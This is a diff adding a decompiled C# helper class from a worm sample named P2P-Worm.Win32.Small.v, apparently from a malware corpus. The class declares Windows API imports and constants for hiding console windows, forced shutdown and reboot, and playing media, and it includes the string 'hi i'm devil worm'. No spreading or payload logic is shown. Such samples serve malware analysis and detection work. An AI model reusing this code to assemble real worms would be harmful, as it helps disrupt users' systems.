MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/api.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: SadNet.api
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using System.Runtime.InteropServices;
namespace SadNet
{
public class api
{
public const int SW_HIDE = 0;
public const int ConsoleWindowClass = 1;
public const string amir = "hi i'm devil worm";
public const int EWX_LOGOFF = 0;
public const int EWX_SHUTDOWN = 1;
public const int EWX_REBOOT = 2;
public const int EWX_FORCE = 4;
public const int EWX_POWEROFF = 8;
[DllImport("winmm.dll", EntryPoint = "mciSendStringA")]
public static extern int mciSendString(
string lpstrCommand,
string lpstrReturnString,
int uReturnLength,
int hwndCallback);
[DllImport("user32")]
public static extern int ShowWindow(int hwnd, int nCmdShow);
[DllImport("user32")]
public static extern int MessageBeep(int wType);
[DllImport("kernel32")]
public static extern int Sleep(int dwMilliseconds);
[DllImport("user32", EntryPoint = "FindWindowA")]
public static extern int FindWindow(string lpClassName, string lpWindowName);
[DllImport("shell32", EntryPoint = "#59")]
public static extern int SHRestartSystemMB(int hOwner, string sExtraPrompt, int uFlags);
}
}